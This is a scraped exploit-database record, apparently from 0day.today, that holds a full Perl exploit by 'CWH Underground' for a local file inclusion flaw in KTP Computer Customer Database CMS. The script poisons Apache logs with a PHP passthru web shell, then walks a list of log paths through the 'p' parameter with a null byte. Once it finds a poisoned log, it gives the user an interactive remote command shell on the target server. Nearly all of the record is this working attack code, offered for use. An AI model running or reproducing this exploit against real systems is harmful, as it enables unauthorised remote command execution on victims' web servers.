Description
Exploit for unknown platform in category web applications
{"id": "1337DAY-ID-4323", "type": "zdt", "bulletinFamily": "exploit", "title": "KTP Computer Customer Database CMS Local File Inclusion Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2008-11-30T00:00:00", "modified": "2008-11-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/4323", "reporter": "CWH Underground", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-03T11:18:47", "viewCount": 6, "enchantments": {"score": {"value": -0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.6}, "sourceHref": "https://0day.today/exploit/4323", "sourceData": "=====================================================================\r\nKTP Computer Customer Database CMS Local File Inclusion Vulnerability\r\n=====================================================================\r\n\r\n\r\n#!/usr/bin/perl -w\r\n#======================================\r\n# KTPCCD Local File Inclusion Exploit\r\n#======================================\r\n#\r\n# ,--^----------,--------,-----,-------^--,\r\n# | ||||||||| `--------' |\t O\t .. CWH Underground Hacking Team ..\r\n# `+---------------------------^----------|\r\n# `\\_,-------, _________________________|\r\n# / XXXXXX /`| /\r\n# / XXXXXX / `\\ /\r\n# / XXXXXX /\\______(\r\n# / XXXXXX / \r\n# / XXXXXX /\r\n# (________( \r\n# `------'\r\n#\r\n#AUTHOR : CWH Underground\r\n#DATE : 30 November 2008\r\n#\r\n#\r\n#####################################################\r\n#APPLICATION : KTP Computer Customer Database CMS\r\n#VERSION : 1\r\n#DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip\r\n######################################################\r\n#Note: magic_quotes_gpc = off\r\n#Vulnerability in Local File Inclusion\r\n#Wrote Exploit for Local File Inclusion <-> Remote Command Execution\r\n#######################################################################################\r\n\r\n\r\nuse LWP::UserAgent;\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n$log=\"../\";\r\n@apache=(\r\n\"../../../../../var/log/httpd/access_log\",\r\n\"../../../../../var/log/httpd/error_log\",\r\n\"../apache/logs/error.log\",\r\n\"../apache/logs/access.log\",\r\n\"../../apache/logs/error.log\",\r\n\"../../apache/logs/access.log\",\r\n\"../../../apache/logs/error.log\",\r\n\"../../../apache/logs/access.log\",\r\n\"../../../../apache/logs/error.log\",\r\n\"../../../../apache/logs/access.log\",\r\n\"../../../../../apache/logs/error.log\",\r\n\"../../../../../apache/logs/access.log\",\r\n\"../logs/error.log\",\r\n\"../logs/access.log\",\r\n\"../../logs/error.log\",\r\n\"../../logs/access.log\",\r\n\"../../../logs/error.log\",\r\n\"../../../logs/access.log\",\r\n\"../../../../logs/error.log\",\r\n\"../../../../logs/access.log\",\r\n\"../../../../../logs/error.log\",\r\n\"../../../../../logs/access.log\",\r\n\"../../../../../etc/httpd/logs/access_log\",\r\n\"../../../../../etc/httpd/logs/access.log\",\r\n\"../../../../../etc/httpd/logs/error_log\",\r\n\"../../../../../etc/httpd/logs/error.log\",\r\n\"../../.. /../../var/www/logs/access_log\",\r\n\"../../../../../var/www/logs/access.log\",\r\n\"../../../../../usr/local/apache/logs/access_log\",\r\n\"../../../../../usr/local/apache/logs/access.log\",\r\n\"../../../../../var/log/apache/access_log\",\r\n\"../../../../../var/log/apache/access.log\",\r\n\"../../../../../var/log/access_log\",\r\n\"../../../../../var/www/logs/error_log\",\r\n\"../../../../../var/www/logs/error.log\",\r\n\"../../../../../usr/local/apache/logs/error_log\",\r\n\"../../../../../usr/local/apache/logs/error.log\",\r\n\"../../../../../var/log/apache/error_log\",\r\n\"../../../../../var/log/apache/error.log\",\r\n\"../../../../../var/log/access_log\",\r\n\"../../../../../var/log/error_log\"\r\n);\r\n\r\nmy $sis=\"$^O\";if ($sis eq 'MSWin32') { system(\"cls\"); } else { system(\"clear\"); }\r\n\r\nprint \"\\n==============================================\\n\";\r\nprint \" KTP Computer Customer Database \\n\";\r\nprint \" Remote Command Execution Exploit \\n\";\r\nprint \" Discovered By CWH Underground \\n\";\r\nprint \"==============================================\\n\";\r\nprint \" \\n\";\r\nprint \" ,--^----------,--------,-----,-------^--, \\n\";\r\nprint \" | ||||||||| `--------' | O \\n\";\r\nprint \" `+---------------------------^----------| \\n\";\r\nprint \" `\\_,-------, _________________________| \\n\";\r\nprint \" / XXXXXX /`| / \\n\";\r\nprint \" / XXXXXX / `\\ / \\n\";\r\nprint \" / XXXXXX /\\______( \\n\";\r\nprint \" / XXXXXX / \\n\";\r\nprint \" / XXXXXX / .. CWH Underground Hacking Team .. \\n\";\r\nprint \" (________( \\n\";\r\nprint \" `------' \\n\";\r\nprint \" \\n\";\r\n\r\n\r\n\r\nif (@ARGV < 2)\r\n{\r\n print \"Usage: ./xpl.pl <Host> <Path>\\n\";\r\n\tprint \"Ex. ./xpl.pl www.hackme.com /ktp\\n\";\r\n\r\n}\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n\r\n\r\nif ( $host =~ /^http:/ ) {$host =~ s/http:\\/\\///g;}\r\n\r\nprint \"\\nTrying to Inject the Code...\\n\";\r\n\r\n$CODE=\"<? passthru(\\$_GET[cmd]) ?>\";\r\n$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\r\nprint $socket \"GET /cwhunderground \".$CODE.\" HTTP/1.1\\r\\n\";\r\nprint $socket \"Host: \".$host.\"\\r\\n\";\r\nprint $socket \"Connection: close\\r\\n\\r\\n\";\r\nclose($socket);\r\n\r\nif ( $host !~ /^http:/ ) {$host = \"http://\" . $host;}\r\n\r\n foreach $getlog(@apache)\r\n {\r\n chomp($getlog);\r\n\t\t\t\t $find= $host.$path.\"/?p=\".$getlog.\"%00\";\r\n $xpl = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\r\n\t\t\t\t $req = HTTP::Request->new(GET => $find);\r\n\t\t\t\t $res = $xpl->request($req);\r\n\t\t\t\t $info = $res->content;\r\n if($info =~ /cwhunderground/)\r\n {print \"\\nSuccessfully injected in $getlog \\n\";$log=$getlog;}\r\n }\r\n\r\n\r\nmy $sis=\"$^O\";if ($sis eq 'MSWin32') { print \"\\n[cmd\\@win32]\\$ \"; } else { print \"\\n[cmd\\@unix]\\$ \"; }\r\n\r\nchomp( $cmd = <STDIN> );\r\n\r\nwhile($cmd !~ \"exit\") { \r\n \r\n\t\t\t\t $shell= $host.$path.\"/?p=\".$log.\"%00&cmd=$cmd\";\r\n $xpl = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\r\n\t\t\t\t $req = HTTP::Request->new(GET => $shell);\r\n\t\t\t\t $res = $xpl->request($req);\r\n\t\t\t\t $info = $res->content;\r\n\t\t\t\t print \"\\n$info\";\r\n\r\n \r\n my $sis=\"$^O\";if ($sis eq 'MSWin32') { print \"\\n[cmd\\@win32]\\$ \"; } else { print \"\\n[cmd\\@unix]\\$ \"; }\r\n chomp( $cmd = <STDIN> ); \r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-03] #", "_state": {"dependencies": 1646823782, "score": 1659766679, "epss": 1678811959}}
{}
KTP Computer Customer Database CMS Local File Inclusion Vulnerability